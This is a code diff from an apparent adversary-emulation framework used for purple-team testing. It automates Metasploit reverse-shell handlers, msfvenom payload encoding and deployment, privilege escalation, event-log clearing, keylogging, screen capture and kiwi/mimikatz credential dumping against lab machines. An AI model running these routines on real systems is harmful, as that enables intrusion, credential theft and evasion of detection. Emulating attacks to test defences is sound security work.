self.attack_logger.vprint(f"No caldera agent needed for: {target_1.get_paw()} ", 3)
break
self.attack_logger.vprint(f"Connecting to caldera {caldera_url}, running agents are: {running_agents}", 3)
self.attack_logger.vprint(f"Missing agent: {target_1.get_paw()} ...", 3)
target_1.start_caldera_client()
self.attack_logger.vprint(f"Restarted caldera agent: {target_1.get_paw()} ...", )
self.attack_logger.vprint(f"Restarted caldera agent: {target_1.get_paw()} ...", 3)
time.sleep(120) # Was 30, but maybe there are timing issues
running_agents = self.caldera_control.list_paws_of_running_agents()
self.attack_logger.vprint(f"{CommandlineColors.OKGREEN}Caldera agents reached{CommandlineColors.ENDC}", 1)
# Add running machines to log
for target in self.targets:
i = target.get_machine_info()
i["role"] = "target"
self.attack_logger.add_machine_info(i)
i = self.attacker_1.get_machine_info()
i["role"] = "attacker"
self.attack_logger.add_machine_info(i)
# Attack them
self.attack_logger.vprint(f"{CommandlineColors.OKBLUE}Running Caldera attacks{CommandlineColors.ENDC}", 1)
for target_1 in self.targets:
if caldera_attacks is None:
# Run caldera attacks
caldera_attacks = self.experiment_config.get_caldera_attacks(target_1.get_os())
if caldera_attacks:
for attack in caldera_attacks:
new_caldera_attacks = self.experiment_config.get_caldera_attacks(target_1.get_os())
else:
new_caldera_attacks = caldera_attacks
if new_caldera_attacks:
for attack in new_caldera_attacks:
# TODO: Work with snapshots
# TODO: If we have several targets in the same group, it is nonsense to attack each one separately. Make this smarter
self.attack_logger.vprint(f"Attacking machine with PAW: {target_1.get_paw()} with {attack}", 2)
@ -137,6 +163,9 @@ class Experiment():
time.sleep(self.experiment_config.get_nap_time())
retries = 100
for target_system in self.targets:
if self.machine_needs_caldera(target_system, caldera_attacks) == 0:
self.attack_logger.vprint(f"No caldera agent needed for: {target_system.get_paw()} ", 3)
continue
running_agents = self.caldera_control.list_paws_of_running_agents()
self.attack_logger.vprint(f"Agents currently connected to the server: {running_agents}", 2)
while target_system.get_paw() not in running_agents:
@ -151,10 +180,12 @@ class Experiment():
self.attack_logger.vprint(f"{CommandlineColors.OKGREEN}Finished Caldera attacks{CommandlineColors.ENDC}", 1)
# Run Kali attacks
# Run plugin based attacks
self.attack_logger.vprint(f"{CommandlineColors.OKBLUE}Running attack plugins{CommandlineColors.ENDC}", 1)
for target_1 in self.targets:
plugin_based_attacks = self.experiment_config.get_plugin_based_attacks(target_1.get_os())
metasploit_plugins = self.plugin_manager.count_caldera_requirements(AttackPlugin, plugin_based_attacks)
print(f"Plugins needing metasploit for {target_1.get_paw()} : {metasploit_plugins}")
for attack in plugin_based_attacks:
# TODO: Work with snapshots
self.attack_logger.vprint(f"Attacking machine with PAW: {target_1.get_paw()} with attack: {attack}", 1)
@ -184,9 +215,28 @@ class Experiment():
self.__stop_attacker()
self.attack_logger.post_process()
self.attack_logger.write_json(os.path.join(self.lootdir, "attack.json"))
attack_log_file_path = os.path.join(self.lootdir, "attack.json")
self.attack_logger.write_json(attack_log_file_path)
document_generator = DocGenerator()
document_generator.generate(attack_log_file_path)
document_generator.compile_documentation()
zip_this += document_generator.get_outfile_paths()
self.zip_loot(zip_this)
def machine_needs_caldera(self, target, caldera_conf):
""" Counts the attacks and plugins needing caldera that are registered for this machine """
c_cmdline = 0
if caldera_conf is not None:
c_cmdline = len(caldera_conf)
c_conffile = len(self.experiment_config.get_caldera_attacks(target.get_os()))
plugin_based_attacks = self.experiment_config.get_plugin_based_attacks(target.get_os())
c_plugins = self.plugin_manager.count_caldera_requirements(AttackPlugin, plugin_based_attacks)
print(f"Caldera count: From cmdline: {c_cmdline}, From conf: {c_conffile} from plugins: {c_plugins}")
return c_cmdline + c_conffile + c_plugins
def attack(self, target, attack):
""" Pick an attack and run it
@ -198,11 +248,13 @@ class Experiment():
for plugin in self.plugin_manager.get_plugins(AttackPlugin, [attack]):
name = plugin.get_name()
self.attack_logger.vprint(f"{CommandlineColors.OKBLUE}Running Kali plugin {name}{CommandlineColors.ENDC}", 2)
self.attack_logger.vprint(f"{CommandlineColors.OKBLUE}Running Attack plugin {name}{CommandlineColors.ENDC}", 2)
plugin.process_config(self.experiment_config.attack_conf(plugin.get_config_section_name()))
plugin.set_attacker_machine(self.attacker_1)
plugin.set_sysconf({})
plugin.set_logger(self.attack_logger)
plugin.set_caldera(self.caldera_control)
plugin.connect_metasploit()
plugin.install()
# plugin.__set_logger__(self.attack_logger)
@ -223,6 +275,10 @@ class Experiment():
zfh.write(os.path.join(self.lootdir, "attack.json"))
# For automation purpose we copy the file into a standard file name
defaultname = os.path.join(self.lootdir, "..", "most_recent.zip")
shutil.copyfile(filename, defaultname)
@staticmethod
def __get_results_files(root):
""" Yields a list of potential result files
@ -236,29 +292,29 @@ class Experiment():
if os.path.exists(a_file):
yield a_file
def __clean_result_files(self, root):
""" Deletes result files
# def __clean_result_files(self, root):
# """ Deletes result files
@param root: Root dir of the machine to collect data from
"""
# @param root: Root dir of the machine to collect data from
# """
# TODO: Properly implement. Get proper root parameter
for a_file in self.__get_results_files(root):
os.remove(a_file)
# for a_file in self.__get_results_files(root):
# os.remove(a_file)
def __collect_loot(self, root):
""" Collect results into loot dir
# def __collect_loot(self, root):
# """ Collect results into loot dir
@param root: Root dir of the machine to collect data from
"""
# @param root: Root dir of the machine to collect data from
# """
try:
os.makedirs(os.path.abspath(self.experiment_config.loot_dir()))
except FileExistsError:
pass
for a_file in self.__get_results_files(root):
self.attack_logger.vprint("Copy {} {}".format(a_file, os.path.abspath(self.experiment_config.loot_dir())), 3)
# try:
# os.makedirs(os.path.abspath(self.experiment_config.loot_dir()))
# except FileExistsError:
# pass
# for a_file in self.__get_results_files(root):
# self.attack_logger.vprint("Copy {} {}".format(a_file, os.path.abspath(self.experiment_config.loot_dir())), 3)
def __start_attacker(self):
""" Start the attacking VM """

@ -3,6 +3,7 @@
""" (Virtual) machine handling. Start, stop, create and destroy. Starting remote commands on them. """
import os
import socket
import time
import requests
@ -372,6 +373,23 @@ class Machine():
return self.vm_manager.get(src, dst)
def get_machine_info(self) -> dict:
""" Returns a dict containing machine info """
return {"name": self.get_name(),
"nicknames": self.get_nicknames(),
"playground": self.get_playground(),
"net_id": self.get_ip(),
"ip": socket.gethostbyname(self.get_ip()),
"os": self.get_os(),
"paw": self.get_paw(),
"group": self.get_group(),
"sensors": [s.name for s in self.get_sensors()],
"vulnerabilities": [v.name for v in self.get_vulnerabilities()]
}
# TODO: Caldera implant
# TODO: Metasploit implant
def install_caldera_server(self, cleanup=False, version="2.8.1"):
""" Installs the caldera server on the VM

@ -43,19 +43,25 @@ class Metasploit():
kwargs["server"] = self.attacker.get_ip()
time.sleep(3) # Waiting for server to start. Or we would get https connection errors when getting the client.
def start_exploit_stub_for_external_payload(self, payload='linux/x64/meterpreter_reverse_tcp', exploit='exploit/multi/handler'):
def start_exploit_stub_for_external_payload(self, payload='linux/x64/meterpreter_reverse_tcp', exploit='exploit/multi/handler', lhost=None):
""" Start a metasploit handler and wait for external payload to connect
@param payload: The payload being used in the implant
@param exploit: Normally the generic handler. Overwrite it if you feel lucky
@param lhost: the ip of the attack host. Use this to use the attacker ip as seen from the controller.
@:returns: res, which contains "job_id" and "uuid"
"""
exploit = self.get_client().modules.use('exploit', exploit)
exp = self.get_client().modules.use('exploit', exploit)
# print(exploit.description)
# print(exploit.missing_required)
payload = self.get_client().modules.use('payload', payload)
pl = self.get_client().modules.use('payload', payload)
# print(payload.description)
# print(payload.missing_required)
payload["LHOST"] = self.attacker.get_ip()
res = exploit.execute(payload=payload)
if lhost is None:
lhost = self.attacker.get_ip()
pl["LHOST"] = lhost
print(f"Creating stub for external payload Exploit: {exploit} Payload: {payload}, lhost: {lhost}")
res = exp.execute(payload=pl)
print(res)
return res
@ -104,7 +110,7 @@ class Metasploit():
while self.get_client().sessions.list == {}:
time.sleep(1)
print(f"Waiting to get any session {retries}")
print(f"Metasploit waiting to get any session {retries}")
retries -= 1
if retries <= 0:
raise MetasploitError("Can not find any session")
@ -191,34 +197,30 @@ class Metasploit():
return res
def smart_infect(self, target, payload_type="windows/x64/meterpreter/reverse_https", payload_name="babymetal.exe"):
def smart_infect(self, target, **kwargs):
""" Checks if a target already has a meterpreter session open. Will deploy a payload if not """
# TODO Smart_infect should detect the platform of the target and pick the proper parameters based on that
payload_name = kwargs.get("outfile", "babymetal.exe")
payload_type = kwargs.get("payload", None)
if payload_type is None:
raise MetasploitError("Payload not defined")
try:
self.start_exploit_stub_for_external_payload(payload=payload_type)
self.start_exploit_stub_for_external_payload(payload_type, lhost=kwargs.get("lhost", None))
self.wait_for_session(2)
except MetasploitError:
self.attack_logger.vprint(
f"{CommandlineColors.OKCYAN}Create payload {payload_name} replacement{CommandlineColors.ENDC}",
f"{CommandlineColors.OKCYAN}Create payload {payload_name} {CommandlineColors.ENDC}",
1)
venom = MSFVenom(self.attacker, target, self.attack_logger)
venom.generate_and_deploy(payload=payload_type,
architecture="x86",
platform="windows",
lhost=self.attacker.get_ip(),
format="exe",
outfile=payload_name,
encoder="x86/shikata_ga_nai",
iterations=5
)
venom.generate_and_deploy(**kwargs)
self.attack_logger.vprint(
f"{CommandlineColors.OKCYAN}Execute {payload_name} replacement - waiting for meterpreter shell{CommandlineColors.ENDC}",
f"{CommandlineColors.OKCYAN}Execute {payload_name} - waiting for meterpreter shell{CommandlineColors.ENDC}",
1)
self.start_exploit_stub_for_external_payload(payload=payload_type)
self.start_exploit_stub_for_external_payload(payload=payload_type, lhost=kwargs.get("lhost", None))
self.wait_for_session()
##########################################################################
@ -276,6 +278,7 @@ class MSFVenom():
cmd += f" -e {encoder}"
if iterations is not None:
cmd += f" -i {iterations}"
cmd += " SessionRetryWait=1 "
# Detecting all the mistakes that already have been made. To be continued
# Check if encoder supports the architecture
@ -294,6 +297,7 @@ class MSFVenom():
# Footnote: Currently we only support windows/linux and the "boring" payloads. This will be more tricky as soon as we get creative here
print(f"MSFVenom: {cmd}")
self.attacker.remote_run(cmd)
def generate_and_deploy(self, **kwargs):
@ -327,8 +331,7 @@ class MSFVenom():
cmd = ""
cmd += f"chmod +x {payload_name}; ./{payload_name}"
if self.target.get_os() == "windows":
cmd = f'{payload_name}'
cmd = f'wmic process call create "%homepath%\\{payload_name}",""'
print(cmd)
if self.attack_logger:
@ -431,7 +434,8 @@ class MetasploitInstant(Metasploit):
target=target.get_ip(),
metasploit_command=command,
ttp=ttp,
logid=logid)
logid=logid,
result=res)
return res
def migrate(self, target, user=None, name=None, arch=None):
@ -443,6 +447,9 @@ class MetasploitInstant(Metasploit):
"""
ttp = "T1055"
tactics = "Privilege Escalation"
tactics_id = "TA0004"
description = "Migrating to another process can escalate privileges, move the meterpreter to a long running process or evade detection. For that the Meterpreter stub is injected into another process and the new stub then connects to the Metasploit server instead of the old one."
process_list = self.ps_process_discovery(target)
ps = self.parse_ps(process_list[0])
@ -456,16 +463,22 @@ class MetasploitInstant(Metasploit):
target_process = random.choice(filtered_list)
print(f"Migrating to process {target_process}")
command = f"migrate {target_process['PID']}"
self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp)
res = self.meterpreter_execute_on([command], target)
print(res)
logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
name="migrate",
description=description,
tactics=tactics,
tactics_id=tactics_id,
ttp=ttp)
res = self.meterpreter_execute_on([command], target, delay=5)
print(f"Result of migrate {res}")
self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp)
ttp=ttp,
result=res,
logid=logid)
return res
def arp_network_discovery(self, target, **kwargs):
@ -498,7 +511,8 @@ class MetasploitInstant(Metasploit):
target=target.get_ip(),
metasploit_command=command,
ttp=ttp,
logid=logid)
logid=logid,
result=res)
return res
def nslookup(self, target, target2, **kwargs):
@ -535,22 +549,31 @@ class MetasploitInstant(Metasploit):
target=target.get_ip(),
metasploit_command=command,
ttp=ttp,
logid=logid)
logid=logid,
result=res)
return res
def getsystem(self, target, **kwargs):
""" Do a network discovery on the target """
def getsystem(self, target, variant=0, **kwargs):
""" Do a network discovery on the target
@param target: Target to attack
@param variant: Variant of getsystem to use. 0 is auto, max is 3
"""
command = "getsystem"
ttp = "????" # It uses one out of three different ways to elevate privileges.
tactics = "Privilege Escalation"
tactics_id = "TA0004"
description = """
Elevate privileges from local administrator to SYSTEM. Three ways to do that will be tried:
* named pipe impersonation using cmd
* named pipe impersonation using a dll
* token duplication
Elevate privileges from local administrator to SYSTEM. Three ways to do that will be tried:\n
0) auto \n
1) named pipe impersonation using cmd \n
2) named pipe impersonation using a dll \n
3) token duplication\n
"""
if variant != 0:
command += f" -t {variant}"
# https://docs.rapid7.com/metasploit/meterpreter-getsystem/
self.attack_logger.vprint(
@ -573,31 +596,45 @@ Elevate privileges from local administrator to SYSTEM. Three ways to do that wil
target=target.get_ip(),
metasploit_command=command,
ttp=ttp,
logid=logid)
logid=logid,
result=res)
return res
def clearev(self, target):
def clearev(self, target, **kwargs):
""" Clears windows event logs """
command = "clearev"
ttp = "T1070.001" # It uses one out of three different ways to elevate privileges.
tactics = "Defense Evasion"
tactics_id = "TA0005"
description = """
Clear windows event logs to hide tracks
"""
self.attack_logger.vprint(
f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1)
self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp)
logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp,
name="clearev",
description=description,
tactics=tactics,
tactics_id=tactics_id,
situation_description=kwargs.get("situation_description", None),
countermeasure=kwargs.get("countermeasure", None))
res = self.meterpreter_execute_on([command], target)
print(res)
self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp)
ttp=ttp,
logid=logid,
result=res)
return res
def screengrab(self, target):
def screengrab(self, target, **kwargs):
""" Creates a screenshot
Before using it, migrate to a process running while you want to monitor.
@ -606,14 +643,25 @@ Elevate privileges from local administrator to SYSTEM. Three ways to do that wil
command = "screengrab"
ttp = "T1113" # It uses one out of three different ways to elevate privileges.
tactics = "Collection"
tactics_id = "TA0009"
description = """
Do screen grabbing to collect data on target
"""
self.attack_logger.vprint(
f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1)
self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp)
logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp,
name="screengrab",
description=description,
tactics=tactics,
tactics_id=tactics_id,
situation_description=kwargs.get("situation_description", None),
countermeasure=kwargs.get("countermeasure", None))
res = self.meterpreter_execute_on(["use espia"], target)
print(res)
res = self.meterpreter_execute_on([command], target)
@ -621,10 +669,12 @@ Elevate privileges from local administrator to SYSTEM. Three ways to do that wil
self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp)
ttp=ttp,
logid=logid,
result=res)
return res
def keylogging(self, target, monitoring_time):
def keylogging(self, target, monitoring_time, **kwargs):
""" Starts keylogging
Before using it, migrate to a process running while you want to monitor.
@ -632,19 +682,29 @@ Elevate privileges from local administrator to SYSTEM. Three ways to do that wil
"winlogon.exe" will monitor user logins. "explorer.exe" during the session.
@param monitoring_time: Seconds the keylogger is running
@param monitoring_time: The time to monitor the keys. In seconds
"""
command = "keyscan_start"
ttp = "T1056.001" # It uses one out of three different ways to elevate privileges.
tactics = "Collection"
tactics_id = "TA0009"
description = """
Log keys to get passwords and other credentials
"""
self.attack_logger.vprint(
f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1)
self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp)
logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp,
name="keylogging",
description=description,
tactics=tactics,
tactics_id=tactics_id,
situation_description=kwargs.get("situation_description", None),
countermeasure=kwargs.get("countermeasure", None))
res = self.meterpreter_execute_on([command], target)
print(res)
time.sleep(monitoring_time)
@ -653,53 +713,82 @@ Elevate privileges from local administrator to SYSTEM. Three ways to do that wil
self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp)
ttp=ttp,
logid=logid,
result=res)
return res
def getuid(self, target):
def getuid(self, target, **kwargs):
""" Returns the UID
"""
command = "getuid"
ttp = "T1056.001" # It uses one out of three different ways to elevate privileges.
tactics = "Collection"
tactics_id = "TA0009"
description = """
Get user id
"""
self.attack_logger.vprint(
f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1)
self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp)
logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp,
name="getuid",
description=description,
tactics=tactics,
tactics_id=tactics_id,
situation_description=kwargs.get("situation_description", None),
countermeasure=kwargs.get("countermeasure", None))
res = self.meterpreter_execute_on([command], target)
self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp)
ttp=ttp,
logid=logid,
result=res)
return res[0]
def sysinfo(self, target):
def sysinfo(self, target, **kwargs):
""" Returns the sysinfo
"""
command = "sysinfo"
ttp = "T1082" # It uses one out of three different ways to elevate privileges.
tactics = "Discovery"
tactics_id = "TA0007"
description = """
Get basic system information
"""
self.attack_logger.vprint(
f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1)
self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp)
logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp,
name="sysinfo",
description=description,
tactics=tactics,
tactics_id=tactics_id,
situation_description=kwargs.get("situation_description", None),
countermeasure=kwargs.get("countermeasure", None))
res = self.meterpreter_execute_on([command], target)
self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp)
ttp=ttp,
logid=logid,
result=res)
return res[0]
def upload(self, target, src, dst, **kwargs):
@ -738,5 +827,62 @@ Uploading new files to the target. Can be config files, tools, implants, ...
target=target.get_ip(),
metasploit_command=command,
ttp=ttp,
logid=logid)
logid=logid,
result=res)
return res
def kiwi(self, target, variant="creds_all", **kwargs):
""" Kiwi is the modern equivalent to mimikatz
@param target: target being attacked
@param variant: kiwi command being used
"""
ttp = "t1003"
tactics = "Credential access"
tactics_id = "TA0006"
description = """
Accessing user credentials in memory
"""
res = []
self.attack_logger.vprint(
f"{CommandlineColors.OKCYAN}Preparing for Kiwi{CommandlineColors.ENDC}", 1)
# We need system privileges
self.getsystem(target, 0, **kwargs)
# Kiwi needs to be loaded
command = "load kiwi "
res += self.meterpreter_execute_on([command], target, kwargs.get("delay", 10))
# Executing kiwi
command = f"{variant} "
self.attack_logger.vprint(
f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1)
logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp,
name="kiwi",
description=description,
tactics=tactics,
tactics_id=tactics_id,
situation_description=kwargs.get("situation_description",
None),
countermeasure=kwargs.get("countermeasure", None)
)
res += self.meterpreter_execute_on([command], target, kwargs.get("delay", 10))
self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp,
logid=logid,
result=res)
print(res)
return res

@ -3,14 +3,16 @@
from glob import glob
import os
import straight.plugin # type: ignore
from plugins.base.plugin_base import BasePlugin
from plugins.base.attack import AttackPlugin
from plugins.base.machinery import MachineryPlugin
from plugins.base.sensor import SensorPlugin
from plugins.base.vulnerability_plugin import VulnerabilityPlugin
import straight.plugin
from app.interface_sfx import CommandlineColors
from app.attack_log import AttackLog
# from app.interface_sfx import CommandlineColors
sections = [{"name": "Vulnerabilities",
@ -27,7 +29,7 @@ sections = [{"name": "Vulnerabilities",
class PluginManager():
""" Manage plugins """
def __init__(self, attack_logger):
def __init__(self, attack_logger: AttackLog):
"""
@param attack_logger: The attack logger to use
@ -69,6 +71,34 @@ class PluginManager():
res.append(plugin)
return res
def count_caldera_requirements(self, subclass, name_filter=None) -> int:
""" Count the plugins matching the filter that have caldera requirements """
# So far it only supports attack plugins. Maybe this will be extended to other plugin types later.
assert subclass == AttackPlugin
plugins = self.get_plugins(subclass, name_filter)
res = 0
for plugin in plugins:
if plugin.needs_caldera():
res += 1
return res
def count_metasploit_requirements(self, subclass, name_filter=None) -> int:
""" Count the plugins matching the filter that have metasploit requirements """
# So far it only supports attack plugins. Maybe this will be extended to other plugin types later.
assert subclass == AttackPlugin
plugins = self.get_plugins(subclass, name_filter)
res = 0
for plugin in plugins:
if plugin.needs_metasploit():
res += 1
return res
def print_list(self):
""" Print a pretty list of all available plugins """

@ -1,41 +1,25 @@
#!/usr/bin/env python3
# A standalon document generator. Takes an attack log and generates a doc using templates. Functionality will later be merged into PurpleDome
""" Generate human readable document describing the attack based on an attack log """
import json
from jinja2 import Environment, FileSystemLoader, select_autoescape
# from pprint import pprint
import argparse
from app.doc_generator import DocGenerator
DEFAULT_ATTACK_LOG = "removeme/loot/2021_09_08___07_41_35/attack.json" # FIN 7 first run on environment
def generate(jfile, outfile):
env = Environment(
loader=FileSystemLoader("templates", encoding='utf-8', followlinks=False),
autoescape=select_autoescape(),
trim_blocks=True,
lstrip_blocks=True
)
template = env.get_template("attack_description.rst")
with open(jfile) as fh:
events = json.load(fh)
def create_parser():
""" Creates the parser for the command line arguments"""
parser = argparse.ArgumentParser("Controls an experiment on the configured systems")
print(template.render(events=events))
# pprint(events)
# dest = os.path.join(self.get_plugin_path(), "filebeat.conf")
# with open(dest, "wt") as fh:
# res = template.render({"playground": self.get_playground()})
# fh.write(res)
parser.add_argument("--attack_log", default=DEFAULT_ATTACK_LOG, help="The attack log the document is based on")
parser.add_argument("--outfile", default="tools/human_readable_documentation/source/contents.rst", help="The default output file")
return parser
if __name__ == "__main__":
# generate("loot/2021_07_19___16_28_45/attack.json", "tools/human_readable_documentation/contents.rst") # Working example for a short run
# generate("loot/2021_07_20___08_26_33/attack.json", "tools/human_readable_documentation/contents.rst") # FIN 7 #1
# generate("loot/2021_07_20___10_07_36/attack.json", "tools/human_readable_documentation/contents.rst") # FIN 7 #2 The one Fabrizio got
#generate("loot/2021_07_28___12_09_00/attack.json",
# "tools/human_readable_documentation/contents.rst") # FIN 7 The last minute locally generated thing
generate("loot/2021_08_30___14_40_23/attack.json",
"tools/human_readable_documentation/contents.rst") # FIN 7 With genereated files added
if __name__ == "__main__":
arguments = create_parser().parse_args()
# generate("loot/2021_07_19___15_10_45/attack.json", "tools/human_readable_documentation/contents.rst")
# generate("removeme.json", "tools/human_readable_documentation/contents.rst")
dg = DocGenerator()
dg.generate(arguments.attack_log, arguments.outfile)

@ -3,6 +3,7 @@
# Init the system
sudo apt-get -y install python3-venv
sudo apt-get -y install latexmk texlive-fonts-recommended texlive-latex-recommended texlive-latex-extra
python3 -m venv venv
source venv/bin/activate
pip3 install -r requirements.txt

@ -1,41 +1,72 @@
#!/usr/bin/env python3
""" Base class for Kali plugins """
from enum import Enum
import os
from plugins.base.plugin_base import BasePlugin
from app.exceptions import PluginError, ConfigurationError
from typing import Optional
from app.calderacontrol import CalderaControl
# from app.metasploit import MSFVenom, Metasploit
from app.exceptions import PluginError, ConfigurationError, RequirementError
from app.metasploit import MetasploitInstant
from plugins.base.machinery import MachineryPlugin
from plugins.base.plugin_base import BasePlugin
class Requirement(Enum):
""" Requirements for this plugin """
METASPLOIT = 1
CALDERA = 2
class AttackPlugin(BasePlugin):
""" Class to execute a command on a kali system targeting another system """
# Boilerplate
name = None
description = None
ttp = None
name: Optional[str] = None
description: Optional[str] = None
ttp: Optional[str] = None
references = None
required_files = [] # Better use the other required_files features
required_files_attacker = [] # a list of files to automatically install to the attacker
required_files_target = [] # a list of files to automatically copy to the targets
required_files: list[str] = [] # Better use the other required_files features
required_files_attacker: list[str] = [] # a list of files to automatically install to the attacker
required_files_target: list[str] = [] # a list of files to automatically copy to the targets
requirements: Optional[list[Requirement]] = [] # Requirements to run this plugin
# TODO: parse results
def __init__(self):
super().__init__()
self.conf = {} # Plugin specific configuration
self.sysconf = {} # System configuration. common for all plugins
self.conf: dict = {} # Plugin specific configuration
# self.sysconf = {} # System configuration. common for all plugins
self.attacker_machine_plugin = None # The machine plugin referencing the attacker. The Kali machine should be the perfect candidate
self.target_machine_plugin = None # The machine plugin referencing the target
self.caldera = None # The Caldera connection object
self.targets = None
self.metasploit_password = "password"
self.metasploit_user = "user"
self.metasploit_password: str = "password"
self.metasploit_user: str = "user"
self.metasploit = None
def needs_caldera(self) -> bool:
""" Returns True if this plugin has Caldera in the requirements """
if Requirement.CALDERA in self.requirements:
return True
return False
def needs_metasploit(self) -> bool:
""" Returns True if this plugin has Metasploit in the requirements """
if Requirement.METASPLOIT in self.requirements:
return True
return False
def connect_metasploit(self):
""" Inits metasploit """
if self.needs_metasploit():
self.metasploit = MetasploitInstant(self.metasploit_password, attack_logger=self.attack_logger, attacker=self.attacker_machine_plugin, username=self.metasploit_user)
# If metasploit requirements are not set, self.metasploit stay None and using metasploit from a plugin not having the requirements will trigger an exception
def copy_to_attacker_and_defender(self):
""" Copy attacker/defender specific files to the machines. Called by setup, do not call it yourself. template processing happens before """
@ -50,7 +81,7 @@ class AttackPlugin(BasePlugin):
""" Cleanup afterwards """
pass # pylint: disable=unnecessary-pass
def attacker_run_cmd(self, command, disown=False):
def attacker_run_cmd(self, command: str, disown: bool = False) -> str:
""" Execute a command on the attacker
@param command: Command to execute
@ -65,7 +96,7 @@ class AttackPlugin(BasePlugin):
res = self.attacker_machine_plugin.__call_remote_run__(command, disown=disown)
return res
def targets_run_cmd(self, command, disown=False):
def targets_run_cmd(self, command: str, disown: bool = False) -> str:
""" Execute a command on the target
@param command: Command to execute
@ -80,7 +111,7 @@ class AttackPlugin(BasePlugin):
res = self.target_machine_plugin.__call_remote_run__(command, disown=disown)
return res
def set_target_machines(self, machine):
def set_target_machines(self, machine: MachineryPlugin):
""" Set the machine to target
@param machine: Machine plugin to communicate with
@ -88,7 +119,7 @@ class AttackPlugin(BasePlugin):
self.target_machine_plugin = machine.vm_manager
def set_attacker_machine(self, machine):
def set_attacker_machine(self, machine: MachineryPlugin):
""" Set the machine plugin class to target
@param machine: Machine to communicate with
@ -101,16 +132,21 @@ class AttackPlugin(BasePlugin):
@param caldera: The caldera object to connect through
"""
self.caldera = caldera
def caldera_attack(self, target, ability_id, parameters=None, **kwargs):
if self.needs_caldera():
self.caldera = caldera
def caldera_attack(self, target: MachineryPlugin, ability_id: str, parameters=None, **kwargs):
""" Attack a single target using caldera
@param target: Target machine object
@param ability_id: Ability if od caldera ability to run
@param ability_id: Ability or caldera ability to run
@param parameters: parameters to pass to the ability
"""
if not self.needs_caldera():
raise RequirementError("Caldera not in requirements")
self.caldera.attack(paw=target.get_paw(),
ability_id=ability_id,
group=target.get_group(),
@ -130,7 +166,7 @@ class AttackPlugin(BasePlugin):
return self.attacker_machine_plugin.get_playground()
def run(self, targets):
def run(self, targets: list[str]):
""" Run the command
@param targets: A list of targets, ip addresses will do
@ -172,7 +208,7 @@ class AttackPlugin(BasePlugin):
raise NotImplementedError
def get_target_by_name(self, name):
def get_target_by_name(self, name: str):
""" Returns a target machine out of the target pool by matching the name
If there is no matching name it will look into the "nicknames" list of the machine config

@ -5,6 +5,7 @@ Special for this plugin class: If there is no plugin matching a specified attack
You only gotta write a plugin if you want some special features
"""
from typing import Optional
from plugins.base.plugin_base import BasePlugin
@ -12,32 +13,32 @@ class CalderaPlugin(BasePlugin):
""" Class to execute a command on a caldera system targeting another system """
# Boilerplate
name = None
description = None
ttp = None
name: Optional[str] = None
description: Optional[str] = None
ttp: Optional[str] = None
references = None
required_files = []
required_files: list[str] = []
# TODO: parse results
def __init__(self):
super().__init__()
self.conf = {} # Plugin specific configuration
self.sysconf = {} # System configuration. common for all plugins
self.conf: dict = {} # Plugin specific configuration
# self.sysconf = {} # System configuration. common for all plugins
def teardown(self):
""" Cleanup afterwards """
pass # pylint: disable=unnecessary-pass
def run(self, targets):
def run(self, targets: list[str]):
""" Run the command
@param targets: A list of targets, ip addresses will do
"""
raise NotImplementedError
def __execute__(self, targets):
def __execute__(self, targets: list[str]) -> str:
""" Execute the plugin. This is called by the code
@param targets: A list of targets, ip addresses will do

@ -4,6 +4,7 @@
from enum import Enum
import os
from typing import Optional
from app.config import MachineConfig
from app.interface_sfx import CommandlineColors
from plugins.base.plugin_base import BasePlugin
@ -26,9 +27,9 @@ class MachineryPlugin(BasePlugin):
""" Class to control virtual machines, vagrant, .... """
# Boilerplate
name = None
name: Optional[str] = None
required_files = []
required_files: list[str] = []
###############
# This is stuff you might want to implement
@ -38,7 +39,7 @@ class MachineryPlugin(BasePlugin):
self.connection = None # Connection
self.config = None
def create(self, reboot=True):
def create(self, reboot: bool = True):
""" Create a machine
@param reboot: Optionally reboot the machine after creation
